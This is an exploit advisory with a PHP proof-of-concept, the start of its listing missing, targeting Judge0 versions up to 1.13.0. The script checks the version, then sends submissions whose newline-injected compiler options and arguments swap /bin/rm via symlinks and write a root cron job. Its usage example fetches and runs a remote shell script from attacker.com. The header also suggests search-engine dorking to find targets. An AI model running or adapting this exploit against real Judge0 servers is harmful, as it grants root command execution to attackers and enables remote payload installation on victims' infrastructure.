=============================================================================================================================================
| # Title     : Judge0 v 1.13.0 PHP Code Injection Vulnerability                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://github.com/judge0/                                                                                                  |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] The code is an exploit written in PHP for a vulnerability in Judge0 that allows arbitrary commands to be executed on the target system by abusing symlinks inside the sandbox environment. The flaw is in Judge0's sandbox handling; PHP is only the language of the PoC.

[+] Affected versions : the script's check_vulnerability() treats any Judge0 version up to and including 1.13.0 as vulnerable and reports later versions as "Safe".

[+] Traces left by this PoC : on the host, a file with a random 8-hex-character name under /etc/cron.d/ holding a root cron entry, and /bin/rm replaced by a copy of /usr/bin/unlink; on the API side, submissions whose compiler_options and command_line_arguments contain embedded newline characters.

[+] Save code as poc.php .

[+] Usage : cmd => c:\www\test\php poc.php

[+] Set target = Line : 111 + 114 (line numbers refer to the author's original file)

[+] Payload : (the start of the listing is missing from this copy; it begins partway through the constructor)

target = rtrim($target, '/'); } private function send_request($endpoint, $method = 'GET', $data = null) { $url = "{$this->target}{$endpoint}"; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($data) { curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data)); curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']); } $response = curl_exec($ch); curl_close($ch); return json_decode($response, true); } private function compile_language_ids() { $languages = $this->send_request('/languages'); if (!$languages) { return false; } foreach ($languages as $language) { if (strpos($language['name'], 'Bash') !== false) { $this->bash_id = $language['id']; } $lang_info = $this->send_request("/languages/{$language['id']}"); if ($lang_info && isset($lang_info['compile_cmd']) && !$lang_info['is_archived']) { $this->languages[] = $language; } } return !empty($this->languages); } public function check_vulnerability() { $res = $this->send_request('/version'); if (!$res) { return "Unknown"; } $version = $res; if (version_compare($version, 
'1.13.0', '<=')) { echo "Vulnerable version detected: $version\n"; return $this->compile_language_ids() ? "Appears" : "Unknown"; } return "Safe"; } public function exploit($cmd) { if (!$this->compile_language_ids()) { die("Failed to get compile language ids\n"); } $this->send_request('/submissions?wait=true', 'POST', [ 'source_code' => 'mv run runbak; ln -s /bin/rm run', 'language_id' => $this->bash_id ?? 46 ]); $cron_path = "/etc/cron.d/" . bin2hex(random_bytes(4)); echo "Writing cron job to $cron_path\n"; $language = !empty($this->languages) ? $this->languages[array_rand($this->languages)] : ['id' => 73, 'name' => 'Rust']; echo "Using language: {$language['id']}, {$language['name']}\n"; $this->send_request('/submissions?wait=true', 'POST', [ 'source_code' => "#test " . bin2hex(random_bytes(5)), 'language_id' => $language['id'], 'compiler_options' => "--version\nln -s /bin/rm ./run\n#", 'command_line_arguments' => "x\n" . "cp /bin/rm {$cron_path}\n" . "cp /usr/bin/unlink /bin/rm\n" . "sed -i 's/.*/#/g' {$cron_path}\n" . "sed -i \"2i {$this->cron_file($cmd)}\" {$cron_path}\n" . "echo 'ok'\n" ]); echo "Exploit executed. Check cron jobs for execution.\n"; } private function cron_file($command) { return "SHELL=/bin/sh\n" . "PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\n" . "* * * * * root $command\n"; } } // Usage example $exploit = new Judge0Exploit("http://target-ip:2358"); $vuln_status = $exploit->check_vulnerability(); if ($vuln_status === "Appears") { $exploit->exploit("wget http://attacker.com/shell.sh -O /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.sh"); } else { echo "Target is not vulnerable.\n"; } ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================